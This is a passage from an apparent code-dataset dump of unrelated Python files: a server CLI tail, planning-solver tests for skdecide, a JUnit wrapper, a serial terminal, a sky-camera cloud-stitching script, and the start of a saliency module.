'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_solvers.py
|
# Copyright (c) AIRBUS and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import pytest
import inspect
from enum import Enum
from typing import NamedTuple, Optional
from math import sqrt
from pathos.helpers import mp
from stable_baselines3 import PPO
from skdecide import DeterministicPlanningDomain, TransitionValue, \
Space, ImplicitSpace, \
EnvironmentOutcome, TransitionOutcome, \
SingleValueDistribution
from skdecide.builders.domain import UnrestrictedActions
from skdecide.hub.space.gym import EnumSpace, MultiDiscreteSpace
from skdecide.utils import load_registered_solver
# Must be defined outside the grid_domain() fixture
# so that parallel domains can pickle it
# /!\ Is it worth defining the domain as a fixture?
class State(NamedTuple):
x: int
y: int
s: int # step => to make the domain cycle-free for algorithms like AO*
# Must be defined outside the grid_domain() fixture
# so that parallel domains can pickle it
# /!\ Is it worth defining the domain as a fixture?
class Action(Enum):
up = 0
down = 1
left = 2
right = 3
class D(DeterministicPlanningDomain, UnrestrictedActions):
T_state = State # Type of states
T_observation = T_state # Type of observations
T_event = Action # Type of events
T_value = float # Type of transition values (rewards or costs)
T_info = None # Type of additional information given as part of an environment outcome
class GridDomain(D):
def __init__(self, num_cols=10, num_rows=10):
self.num_cols = num_cols
self.num_rows = num_rows
def _get_next_state(self, memory: D.T_memory[D.T_state],
action: D.T_agent[D.T_concurrency[D.T_event]]) -> D.T_state:
if action == Action.left:
next_state = State(max(memory.x - 1, 0), memory.y, memory.s + 1)
if action == Action.right:
next_state = State(min(memory.x + 1, self.num_cols - 1), memory.y, memory.s + 1)
if action == Action.up:
next_state = State(memory.x, max(memory.y - 1, 0), memory.s + 1)
if action == Action.down:
next_state = State(memory.x, min(memory.y + 1, self.num_rows - 1), memory.s + 1)
return next_state
def _get_transition_value(self, memory: D.T_memory[D.T_state], action: D.T_agent[D.T_concurrency[D.T_event]],
next_state: Optional[D.T_state] = None) -> D.T_agent[TransitionValue[D.T_value]]:
if next_state.x == memory.x and next_state.y == memory.y:
cost = 2 # big penalty when hitting a wall
else:
cost = abs(next_state.x - memory.x) + abs(next_state.y - memory.y) # every move costs 1
return TransitionValue(cost=cost)
def _is_terminal(self, state: D.T_state) -> bool:
return self._is_goal(state) or state.s >= 100
def _get_action_space_(self) -> D.T_agent[Space[D.T_event]]:
return EnumSpace(Action)
def _get_goals_(self) -> D.T_agent[Space[D.T_observation]]:
return ImplicitSpace(lambda state: state.x == (self.num_cols - 1) and state.y == (self.num_rows - 1))
def _get_initial_state_(self) -> D.T_state:
return State(x=0, y=0, s=0)
def _get_observation_space_(self) -> D.T_agent[Space[D.T_observation]]:
return MultiDiscreteSpace([self.num_cols, self.num_rows, 100])
# FIXTURES
@pytest.fixture(params=[{'entry': 'Astar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'debug_logs': False},
'optimal': True},
{'entry': 'AOstar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'debug_logs': False},
'optimal': True},
{'entry': 'BFWS',
'config': {'state_features': lambda d, s: (s.x, s.y),
'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'termination_checker': lambda d, s: d.is_goal(s),
'debug_logs': False},
'optimal': True},
{'entry': 'IW',
'config': {'state_features': lambda d, s: (s.x, s.y),
'debug_logs': False},
'optimal': True},
{'entry': 'RIW',
'config': {'state_features': lambda d, s: (s.x, s.y),
'time_budget': 20,
'rollout_budget': 10,
'max_depth': 10,
'exploration': 0.25,
'use_simulation_domain': True,
'online_node_garbage': True,
'continuous_planning': True,
'debug_logs': False},
'optimal': False},
{'entry': 'UCT',
'config': {'time_budget': 20,
'rollout_budget': 10,
'max_depth': 10,
'continuous_planning': True,
'debug_logs': False},
'optimal': False},
{'entry': 'LRTDP',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'use_labels': True,
'time_budget': 60000,
'rollout_budget': 10000,
'max_depth': 500,
'discount': 1.0,
'epsilon': 0.001,
'online_node_garbage': True,
'continuous_planning': False,
'debug_logs': False},
'optimal': True},
{'entry': 'ILAOstar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'discount': 1.0,
'epsilon': 0.001,
'debug_logs': False},
'optimal': True}])
def solver_cpp(request):
return request.param
@pytest.fixture(params=[{'entry': 'LazyAstar',
'config': {'verbose': False},
'optimal': True},
{'entry': 'StableBaseline',
'config': {'algo_class': PPO,
'baselines_policy': 'MlpPolicy',
'learn_config': {'total_timesteps': 10},
'verbose': 1},
'optimal': False}])
def solver_python(request):
return request.param
@pytest.fixture(params=[False, True])
def parallel(request):
return request.param
@pytest.fixture(params=[False, True])
def shared_memory(request):
return request.param
# HELPER FUNCTION
def get_plan(domain, solver):
plan = []
cost = 0
observation = domain.reset()
nb_steps = 0
while (not domain.is_goal(observation)) and nb_steps < 20:
plan.append(solver.sample_action(observation))
outcome = domain.step(plan[-1])
cost += outcome.value.cost
observation = outcome.observation
nb_steps += 1
return plan, cost
# SHARED MEMORY PROXY FOR PARALLEL TESTS
class GridShmProxy:
_register_ = [(State, 2), (Action, 1), (EnumSpace, 1), (SingleValueDistribution, 1),
(TransitionValue, 1), (EnvironmentOutcome, 1), (TransitionOutcome, 1),
(bool, 1), (float, 1), (int, 2)]
def __init__(self):
self._proxies_ = {State: GridShmProxy.StateProxy, Action: GridShmProxy.ActionProxy,
EnumSpace: GridShmProxy.EnumSpaceProxy,
SingleValueDistribution: GridShmProxy.SingleValueDistributionProxy,
TransitionValue: GridShmProxy.TransitionValueProxy,
EnvironmentOutcome: GridShmProxy.EnvironmentOutcomeProxy,
TransitionOutcome: GridShmProxy.TransitionOutcomeProxy,
bool: GridShmProxy.BoolProxy,
float: GridShmProxy.FloatProxy,
int: GridShmProxy.IntProxy}
def copy(self):
p = GridShmProxy()
p._proxies_ = dict(self._proxies_)
return p
def register(self):
return GridShmProxy._register_
def initialize(self, t):
return self._proxies_[t].initialize()
def encode(self, value, shm_value):
self._proxies_[type(value)].encode(value, shm_value)
def decode(self, t, shm_value):
return self._proxies_[t].decode(shm_value)
class StateProxy:
@staticmethod
def initialize():
return mp.Array('d', [0, 0, 0], lock=True)
@staticmethod
def encode(state, shm_state):
shm_state[0] = state.x
shm_state[1] = state.y
shm_state[2] = state.s
@staticmethod
def decode(shm_state):
return State(int(shm_state[0]), int(shm_state[1]), int(shm_state[2]))
class ActionProxy:
@staticmethod
def initialize():
return mp.Value('I', 0, lock=True)
@staticmethod
def encode(action, shm_action):
shm_action.value = action.value
@staticmethod
def decode(shm_action):
return Action(shm_action.value)
class EnumSpaceProxy: # Always used with Action as enum class
@staticmethod
def initialize():
return mp.Array('c', b'')
@staticmethod
def encode(val, shm_val):
pass
@staticmethod
def decode(val):
return EnumSpace(Action)
class SingleValueDistributionProxy: # Always used with State
@staticmethod
def initialize():
return GridShmProxy.StateProxy.initialize()
@staticmethod
def encode(svd, shm_svd):
GridShmProxy.StateProxy.encode(svd._value, shm_svd)
@staticmethod
def decode(svd):
return SingleValueDistribution(GridShmProxy.StateProxy.decode(svd))
class TransitionValueProxy:
@staticmethod
def initialize():
return [mp.Value('d', 0), mp.Value('b', False)]
@staticmethod
def encode(value, shm_value):
if value.reward is not None:
shm_value[0] = value.reward
shm_value[1] = True
elif value.cost is not None:
shm_value[0] = value.cost
shm_value[1] = False
else:
shm_value[0] = 0
shm_value[1] = True
@staticmethod
def decode(value):
if value[1].value:
return TransitionValue(reward=value[0].value)
else:
return TransitionValue(cost=value[0].value)
class EnvironmentOutcomeProxy:
@staticmethod
def initialize():
return [GridShmProxy.StateProxy.initialize()] + \
GridShmProxy.TransitionValueProxy.initialize() + \
[GridShmProxy.BoolProxy.initialize()]
@staticmethod
def encode(outcome, shm_outcome):
GridShmProxy.StateProxy.encode(outcome.observation, shm_outcome[0])
GridShmProxy.TransitionValueProxy.encode(outcome.value, shm_outcome[1:3])
GridShmProxy.BoolProxy.encode(outcome.termination, shm_outcome[3])
@staticmethod
def decode(outcome):
return EnvironmentOutcome(observation=GridShmProxy.StateProxy.decode(outcome[0]),
value=GridShmProxy.TransitionValueProxy.decode(outcome[1:3]),
termination=GridShmProxy.BoolProxy.decode(outcome[3]))
class TransitionOutcomeProxy:
@staticmethod
def initialize():
return [GridShmProxy.StateProxy.initialize()] + \
GridShmProxy.TransitionValueProxy.initialize() + \
[GridShmProxy.BoolProxy.initialize()]
@staticmethod
def encode(outcome, shm_outcome):
GridShmProxy.StateProxy.encode(outcome.state, shm_outcome[0])
GridShmProxy.TransitionValueProxy.encode(outcome.value, shm_outcome[1:3])
GridShmProxy.BoolProxy.encode(outcome.termination, shm_outcome[3])
@staticmethod
def decode(outcome):
return TransitionOutcome(state=GridShmProxy.StateProxy.decode(outcome[0]),
value=GridShmProxy.TransitionValueProxy.decode(outcome[1:3]),
termination=GridShmProxy.BoolProxy.decode(outcome[3]))
class BoolProxy:
@staticmethod
def initialize():
return mp.Value('b', False)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return bool(val.value)
class FloatProxy:
@staticmethod
def initialize():
return mp.Value('d', False)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return float(val.value)
class IntProxy:
@staticmethod
def initialize():
return mp.Value('i', False)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return int(val.value)
# TESTS
def do_test_cpp(solver_cpp, parallel, shared_memory, result):
noexcept = True
try:
dom = GridDomain()
solver_type = load_registered_solver(solver_cpp['entry'])
solver_args = solver_cpp['config']
if 'parallel' in inspect.signature(solver_type.__init__).parameters:
solver_args['parallel'] = parallel
if 'shared_memory_proxy' in inspect.signature(solver_type.__init__).parameters and shared_memory:
solver_args['shared_memory_proxy'] = GridShmProxy()
solver_args['domain_factory'] = lambda: GridDomain()
with solver_type(**solver_args) as slv:
GridDomain.solve_with(slv)
plan, cost = get_plan(dom, slv)
except Exception as e:
print(e)
noexcept = False
result.send(solver_type.check_domain(dom) and noexcept and \
((not solver_cpp['optimal']) or parallel or (cost == 18 and len(plan) == 18)))
result.close()
def test_solve_cpp(solver_cpp, parallel, shared_memory):
# We launch each algorithm in a separate process in order to avoid the various
# algorithms to initialize different versions of the OpenMP library in the same
# process (since our C++ hub algorithms and other algorithms like PPO2 - via torch -
# might link against different OpenMP libraries)
pparent, pchild = mp.Pipe(duplex=False)
p = mp.Process(target=do_test_cpp, args=(solver_cpp, parallel, shared_memory, pchild,))
p.start()
r = pparent.recv()
p.join()
p.close()
pparent.close()
assert r
def do_test_python(solver_python, result):
noexcept = True
try:
dom = GridDomain()
solver_type = load_registered_solver(solver_python['entry'])
solver_args = solver_python['config']
with solver_type(**solver_args) as slv:
GridDomain.solve_with(slv)
plan, cost = get_plan(dom, slv)
except Exception as e:
print(e)
noexcept = False
result.send(solver_type.check_domain(dom) and noexcept and \
((not solver_python['optimal']) or (cost == 18 and len(plan) == 18)))
result.close()
def test_solve_python(solver_python):
# We launch each algorithm in a separate process in order to avoid the various
# algorithms to initialize different versions of the OpenMP library in the same
# process (since our C++ hub algorithms and other algorithms like PPO2 - via torch -
# might link against different OpenMP libraries)
pparent, pchild = mp.Pipe(duplex=False)
p = mp.Process(target=do_test_python, args=(solver_python, pchild,))
p.start()
r = pparent.recv()
p.join()
p.close()
pparent.close()
assert r
|
junit_cmd_wrapper.py
|
#!/usr/bin/env python
import argparse
import logging
import string
import subprocess
import sys
import time
import xml.etree.cElementTree as ElementTree
from io import BytesIO
from threading import Thread
logger = logging.getLogger('ta-junit-wrapper')
class TeeBytesIO(BytesIO):
"""duplicate each write command to an additional file object"""
def __init__(self, tee_fh):
self.tee_fh = tee_fh
super(TeeBytesIO, self).__init__()
def write(self, s):
self.tee_fh.write(s)
BytesIO.write(self, s)
def get_parser():
parser = argparse.ArgumentParser(description='JUNIT wrapper')
parser.add_argument(
'-o',
'--output-file',
metavar='FILE',
type=argparse.FileType('w'),
help='output JUNIT XML file name',
required=True
)
parser.add_argument(
'-s',
'--test-suite',
metavar='NAME',
help='test suite name',
required=True
)
parser.add_argument(
'-t',
'--test-case',
metavar='NAME',
help='test case name',
required=True
)
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='verbose - duplicate command output to STDOUT'
)
parser.add_argument(
'--validate',
action='store_true',
help='validate generated XML against Jenkins XSD. Requires "requests" and "lxml" libraries'
)
parser.add_argument(
'--command',
nargs=argparse.REMAINDER,
help='command to be executed'
)
return parser
def get_file_copy_worker(infile, outfile):
def do_work(_infile, _outfile):
for line in iter(_infile.readline, ''):
_outfile.write(line)
_infile.close()
thread = Thread(target=do_work, args=(infile, outfile))
thread.daemon = True
thread.start()
return thread
def generate_junit_xml(test_suite, test_case, out_fh, stdout, stderr, return_code, duration_in_sec, command):
test_suite_root_element = ElementTree.Element(
'testsuite',
tests='1',
name=test_suite.replace(' ', '_'),
failures=str(1 if return_code != 0 else 0),
time=str(duration_in_sec)
)
test_case_element = ElementTree.SubElement(
test_suite_root_element,
'testcase',
time=str(duration_in_sec),
name=test_case.replace(' ', '_')
)
ElementTree.SubElement(test_case_element, 'system-out').text = filter(
lambda x: x in string.printable, stdout.getvalue()
)
ElementTree.SubElement(test_case_element, 'system-err').text = filter(
lambda x: x in string.printable, stderr.getvalue()
)
if return_code != 0:
failure_msg = 'Command "{cmd}" returned {ret}'.format(cmd=command, ret=return_code)
ElementTree.SubElement(
test_case_element,
'failure',
type='Non-Zero return code',
message=failure_msg)
ElementTree.ElementTree(test_suite_root_element).write(out_fh)
def main():
parser = get_parser()
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
stream=sys.stdout
)
stdout = TeeBytesIO(sys.stdout) if args.verbose else BytesIO()
stderr = TeeBytesIO(stdout)
logger.debug('Executing + ' + ' '.join(args.command))
start_time = time.time()
process = subprocess.Popen(args.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
threads = [
get_file_copy_worker(process.stdout, stdout),
get_file_copy_worker(process.stderr, stderr)
]
for t in threads: # wait for IO completion
t.join()
return_code = process.wait()
logger.debug('Wrapped process return code ' + str(return_code))
duration_in_sec = time.time() - start_time
with args.output_file as fh: # insure file object is closed - since it will be read in do_validate()
generate_junit_xml(
args.test_suite,
args.test_case,
fh,
stdout,
stderr,
return_code,
duration_in_sec,
args.command
)
logger.debug('Generated JUNIT report file ' + args.output_file.name)
if args.validate:
do_validate(args.output_file.name)
raise SystemExit(return_code)
if __name__ == '__main__':
main()
|
miniterm.py
|
#!/usr/bin/env python
#very simple serial terminal
#http://pyserial.sf.net package required
#input characters are sent directly, received characters are displays as is
#baudrate and echo configuartion is done through globals:
#<cliechti@gmx.net>
import sys, os, serial, threading, getopt
#EXITCHARCTER = '\x1b' #ESC
EXITCHARCTER = '\x04' #ctrl+d
#first choosea platform dependant way to read single characters from the console
if os.name == 'nt': #sys.platform == 'win32':
import msvcrt
def getkey():
while 1:
if echo:
z = msvcrt.getche()
else:
z = msvcrt.getch()
if z == '\0' or z == '\xe0': #functions keys
msvcrt.getch()
else:
return z
elif os.name == 'posix':
#XXX: Untested code derrived from the Python FAQ....
# import termios, TERMIOS, sys, os
import termios, sys, os
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] = new[3] & ~TERMIOS.ICANON & ~TERMIOS.ECHO
new[6][TERMIOS.VMIN] = 1
new[6][TERMIOS.VTIME] = 0
termios.tcsetattr(fd, TERMIOS.TCSANOW, new)
s = '' # We'll save the characters typed and add them to the pool.
def getkey():
c = os.read(fd, 1)
if echo: sys.stdout.write(c)
return c
def clenaup_console():
termios.tcsetattr(fd, TERMIOS.TCSAFLUSH, old)
sys.exitfunc = clenaup_console #terminal modes have to be restored on exit...
else:
raise "Sorry no implementation for your platform (%s) available." % sys.platform
def reader():
"""loop forever and copy serial->console"""
while 1:
sys.stdout.write(s.read())
def writer():
"""loop forever and copy console->serial"""
while 1:
c = getkey()
if c == EXITCHARCTER: break #exit on esc
s.write(c) #send character
if convert_outgoing_cr and c == '\r':
s.write('\n')
if echo: sys.stdout.write('\n')
#print a short help message
def usage():
print >>sys.stderr, """USAGE: %s [options]
Simple Terminal Programm for the serial port.
options:
-p, --port=PORT: port, a number, defualt = 0 or a device name
-b, --baud=BAUD: baudrate, default 9600
-r, --rtscts: enable RTS/CTS flow control (default off)
-x, --xonxoff: enable software flow control (default off)
-e, --echo: enable local echo (default off)
-c, --cr: disable CR -> CR+LF translation
""" % sys.argv[0]
if __name__ == '__main__':
#parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hp:b:rxec",
["help", "port=", "baud=", "rtscts", "xonxoff", "echo", "cr"])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
port = 0
baudrate = 9600
echo = 0
convert_outgoing_cr = 1
rtscts = 0
xonxoff = 0
for o, a in opts:
if o in ("-h", "--help"): #help text
usage()
sys.exit()
elif o in ("-p", "--port"): #specified port
try:
port = int(a)
except ValueError:
port = a
elif o in ("-b", "--baud"): #specified baudrate
try:
baudrate = int(a)
except ValueError:
raise ValueError, "Baudrate must be a integer number"
elif o in ("-r", "--rtscts"):
rtscts = 1
elif o in ("-x", "--xonxoff"):
xonxoff = 1
elif o in ("-e", "--echo"):
echo = 1
elif o in ("-c", "--cr"):
convert_outgoing_cr = 0
try:
s = serial.Serial(port, baudrate, rtscts=rtscts, xonxoff=xonxoff)
except:
print "could not open port"
sys.exit(1)
print "--- Miniterm --- type Ctrl-D to quit"
#start serial->console thread
r = threading.Thread(target=reader)
r.setDaemon(1)
r.start()
#enter console->serial loop
writer()
print "\n--- exit ---"
|
stitch_demo.py
|
import numpy as np
import os,sys, glob
from matplotlib import pyplot as plt
import camera as cam
import stat_tools as st
from scipy.ndimage import morphology,filters, sobel ####more efficient than skimage
from skimage.morphology import remove_small_objects
from collections import deque
import multiprocessing,subprocess,pickle
import time, geo
from functools import reduce
from operator import concat
SAVE_FIG=True
REPROCESS=False ####reprocess already processed file?
MAX_INTERVAL = 179 ####max allowed interval between two frames for cloud motion estimation
deg2km=6367*np.pi/180
all_cams=['HD5A', 'HD5B', 'HD4A','HD4B', 'HD3A', 'HD3B','HD2B', 'HD2C', 'HD1B', 'HD1C'];
height_group={'HD1B':['HD1C', 'HD2B'], 'HD1C':['HD1B', 'HD2C'], 'HD2B':['HD2C', 'HD3A'], 'HD2C':['HD2B', 'HD3B'],\
'HD3A':['HD3B','HD4A'], 'HD3B':['HD3A', 'HD4B'], 'HD4A':['HD4B','HD5A'], 'HD4B':['HD4A', 'HD5A', 'HD3B'],\
'HD5A':['HD5B', 'HD4A', 'HD4B'], 'HD5B':['HD5A', 'HD4B']}
stitch_pair={'HD1B':'HD1C', 'HD1C':'HD1B','HD2B':'HD2C','HD2C':'HD2B','HD3A':'HD3B','HD3B':'HD3A', 'HD4A':'HD4B','HD4B':'HD4A', 'HD5A':'HD5B','HD5B':'HD5A'}
# camIDs=[['HD1B','HD1C'],['HD2B','HD2C'],['HD3A','HD3B'],['HD4A','HD4B'],['HD5A','HD5B']];
camIDs=['HD1B','HD2B','HD3A','HD4A','HD5A'];
cid_flat=camIDs+[stitch_pair[camID] for camID in camIDs]
# days=['20180823124','20180829165'];
# # days=['20180825161']; ####multilayer cloud
# days=['20180829165']
# days=['20180829162'] #####scattered cloud
days=['20181001141'] #####scattered cloud
# days=['20180922150'] ####high clouds
inpath='~/data/images/'
# tmpfs='/dev/shm/'
tmpfs='~/ldata/tmp/'
stitch_path='~/ldata/stitch/'
cameras={};
for camID in all_cams:
cameras[camID] = cam.camera(camID,max_theta=70,nx=1000,ny=1000)
lon0,lat0=cameras['HD5A'].lon,cameras['HD5B'].lat
x_cams=(cameras['HD1B'].lon-lon0)*deg2km*np.cos(cameras['HD1B'].lat*np.pi/180)
y_cams=(lat0-cameras['HD1B'].lat)*deg2km
def stitch(cams, dates):
for day in dates:
flist = sorted(glob.glob(inpath+camIDs[0]+'/'+day[:8]+'/'+camIDs[0]+'_'+day+'*jpg'))
if len(flist)<=1:
continue
for f in flist[1:]:
ymdhms=f[-18:-4]
print('Processing',ymdhms)
if os.path.isfile(stitch_path+ymdhms+'.sth') and (~REPROCESS): ######already processed, skip
continue
counter=0;
selected=[]; imgs=[]
for counter in range(20):
pkls=sorted(glob.glob(tmpfs+day[:8]+'/HD*_'+ymdhms+'.hkl'));
for pkl in pkls:
camID=pkl[-23:-19]
if camID not in cid_flat or camID in selected or stitch_pair[camID] in selected:
continue;
with open(pkl,'rb') as input:
try:
img=pickle.load(input)
except EOFError:
img=None
if img is not None:
imgs+=[img];
selected += [camID]
if len(selected)>=len(camIDs)-2:
break;
time.sleep(5);
if len(imgs)<=0:
continue
# print(selected)
h=[]; v=[]
for i, img in enumerate(imgs):
if np.isfinite(img.height):
h += [img.height]
if len(img.v)>=1:
v += [img.v]
if len(h)<=0 or len(v)<=0: ####clear sky
h=[15];
v=[[0,0]];
else:
h=np.array(h)/1e3; v=np.array(v)
h=np.nanmedian(h,axis=0); v=np.nanmedian(v,axis=0);
max_tan=np.tan(imgs[0].max_theta*np.pi/180)
for ilayer,height in enumerate(h):
if np.isnan(h[ilayer]): continue
stch=cam.stitch(ymdhms);
stch.sz,stch.saz=imgs[0].sz,imgs[0].saz
stch.height=height; stch.v=v
pixel_size=2*h[ilayer]*max_tan/imgs[0].nx;
stch.pixel_size=pixel_size;
xlen,ylen=2*h[ilayer]*max_tan+x_cams, 2*h[ilayer]*max_tan+y_cams
nstch_y,nstch_x=int(ylen//pixel_size),int(xlen//pixel_size)
stch.lon=lon0-h[ilayer]*max_tan/deg2km/np.cos(cameras['HD3A'].lat*np.pi/180);
stch.lat=lat0+h[ilayer]*max_tan/deg2km;
# print(pixel_size,xlen,ylen)
rgb=np.zeros((nstch_y,nstch_x,3),dtype=np.float32)
cnt=np.zeros((nstch_y,nstch_x),dtype=np.uint8);
cm=np.zeros((nstch_y,nstch_x),dtype=np.float32)
for i, img in enumerate(imgs):
start_x=(img.lon-lon0)*deg2km*np.cos(img.lat*np.pi/180)/pixel_size; start_x=int(start_x)
start_y=(lat0-img.lat)*deg2km/pixel_size; start_y=int(start_y)
tmp=np.flip(img.rgb,axis=1); #tmp[img.cm!=ilayer+1,:]=0;
mk=tmp[...,0]>0
# print(img.camID,ilayer,h[ilayer],start_x,start_y,mk.shape,stitched.shape)
rgb[start_y:start_y+img.ny,start_x:start_x+img.nx][mk]+=tmp[mk]
cnt[start_y:start_y+img.ny,start_x:start_x+img.nx]+=mk
if (img.cm is not None):
tmp=np.flip(img.cm,axis=1); #tmp[img.cm!=ilayer+1,:]=0;
cm[start_y:start_y+img.ny,start_x:start_x+img.nx][mk]+=tmp[mk]
for i in range(3):
rgb[...,i]/=cnt
cm/=cnt
# fig,ax=plt.subplots(1,2); ax[0].imshow(cnt); ax[1].imshow(rgb.astype(np.uint8)); plt.show()
stch.rgb=rgb.astype(np.uint8); stch.cm=(cm+0.5).astype(np.uint8)
# stch.dump_stitch(stitch_path+'/'+day[:8]+'/'+ymdhms+'.sth');
plt.figure(); plt.imshow(stch.rgb,extent=[0,xlen,ylen,0]);
plt.xlabel('East distance, km'); plt.ylabel('South distance, km')
plt.tight_layout();
plt.show();
# # fig.savefig(outpath+ymdhms); plt.close();
def height(args):
imager,neighbors,day=args
ymd=day[:8]
flist = sorted(glob.glob(inpath+imager.camID+'/'+ymd+'/'+imager.camID+'_'+day+'*jpg'))
if len(flist)<=0:
return
for f in flist:
basename=f[-23:-4]
if os.path.isfile(tmpfs+f[-18:-10]+'/'+basename+'.hkl') and (~REPROCESS): ######already processed, skip
continue
# print('Procesing', basename)
fpickle = glob.glob(tmpfs+f[-18:-10]+'/'+basename+'*pkl')
img=None
if len(fpickle)<=0:
img=cam.preprocess(imager,f,tmpfs);
else:
with open(fpickle[0],'rb') as input:
try:
img=pickle.load(input);
except EOFError:
img=None
if img is None or img.red is None:
continue
if img.layers<=0:
img.dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.hkl');
continue;
if img.layers>=1:
h = [np.nan]*img.layers
for inghb,neighbor in enumerate(neighbors):
bname=basename.replace(imager.camID,neighbor.camID);
fp_nb = glob.glob(tmpfs+f[-18:-10]+'/'+bname+'*pkl')
img1=None;
if len(fp_nb)<=0:
fnb=f.replace(imager.camID,neighbor.camID)
img1=cam.preprocess(neighbor,fnb,tmpfs); ###img object contains four data fields: rgb, red, rbr, and cm
else:
with open(fp_nb[0],'rb') as input:
try:
img1=pickle.load(input);
except EOFError:
img1=None
if img1 is None or img1.red is None:
continue
distance = 6367e3*geo.distance_sphere(img.lat,img.lon,img1.lat,img1.lon)
for ih in range(img.layers):
if np.isfinite(h[ih]):
continue
if (ih>=1) and (distance<500):
break;
res=cam.cloud_height(img,img1,layer=ih+1, distance=distance)
if np.isfinite(res) and res<20*distance and res>0.5*distance:
h[ih]=int(res);
# print('Cloud height computed for', f[-23:]);
# print('Cloud layer',ih+1,':',res,' computed with cameras ',img.camID,img1.camID,'(distance:',distance,'m)')
if not SAVE_FIG:
fig,ax=plt.subplots(2,2,figsize=(10,10),sharex=True,sharey=True);
ax[0,0].imshow(img.rgb); ax[0,1].imshow(img1.rgb);
ax[0,0].set_title(img.camID); ax[0,1].set_title(img1.camID)
ax[1,0].imshow(img.cm); ax[1,1].imshow(img1.cm);
ax[1,0].set_title(str(6367e3*geo.distance_sphere(img.lat,img.lon,img1.lat,img1.lon)))
plt.tight_layout();
plt.show();
if np.isfinite(h[-1]):
break
# img.height+=[h];
img.height=h;
img.dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.hkl');
if __name__ == "__main__":
for day in days:
if not os.path.isdir(stitch_path+day[:8]):
try:
subprocess.call(['mkdir', stitch_path+day[:8]])
except:
print('Cannot create directory,',stitch_path+day[:8])
continue
p0=multiprocessing.Process(target=stitch, args=(camIDs, days,))
p0.start();
p = multiprocessing.Pool(len(camIDs))
for day in days:
if not os.path.isdir(tmpfs+day[:8]):
try:
subprocess.call(['mkdir', tmpfs+day[:8]])
except:
print('Cannot create directory,',tmpfs+day[:8])
continue
# args=[[[camID for camID in camg], day] for camg in camIDs]
args=[[cameras[camID], [cameras[cmr] for cmr in height_group[camID]], day] for camID in cid_flat]
p.map(height,args)
p0.join();
|
saliency.py
|
from __future__ import division
import concurrent
import os
import sys
import time
from threading import Thread
sys.path.append('/Users/rodrigobresan/Documents/dev/github/anti_spoofing/spoopy/spoopy')
import math
import networkx as nx
# import matplotlib.pyplot as plt
import numpy as np
import scipy.spatial.distance
import scipy.signal
import skimage
import skimage.io
from skimage.segmentation import slic
from skimage.util import img_as_float
import cv2
def S(x1, x2, geodesic, sigma_clr=10):
return math.exp(-pow(geodesic[x1, x2], 2) / (2 * sigma_clr * sigma_clr))
def compute_saliency_cost(smoothness, w_bg, wCtr):
n = len(w_bg)
A = np.zeros((n, n))
b = np.zeros((n))
for x in range(0, n):
A[x, x] = 2 * w_bg[x] + 2 * (wCtr[x])
b[x] = 2 * wCtr[x]
for y in range(0, n):
A[x, x] += 2 * smoothness[x, y]
A[x, y] -= 2 * smoothness[x, y]
x = np.linalg.solve(A, b)
return x
def path_length(path, G):
dist = 0.0
for i in range(1, len(path)):
dist += G[path[i - 1]][path[i]]['weight']
return dist
def make_graph(grid):
# get unique labels
vertices = np.unique(grid)
# map unique labels to [1,...,num_labels]
reverse_dict = dict(zip(vertices, np.arange(len(vertices))))
grid = np.array([reverse_dict[x] for x in grid.flat]).reshape(grid.shape)
# create edges
down = np.c_[grid[:-1, :].ravel(), grid[1:, :].ravel()]
right = np.c_[grid[:, :-1].ravel(), grid[:, 1:].ravel()]
all_edges = np.vstack([right, down])
all_edges = all_edges[all_edges[:, 0] != all_edges[:, 1], :]
all_edges = np.sort(all_edges, axis=1)
num_vertices = len(vertices)
edge_hash = all_edges[:, 0] + num_vertices * all_edges[:, 1]
# find unique connections
edges = np.unique(edge_hash)
# undo hashing
edges = [[vertices[x % num_vertices], vertices[int(x / num_vertices)]] for x in edges]
return vertices, edges
def get_saliency_rbd(img_path):
# Saliency map calculation based on:
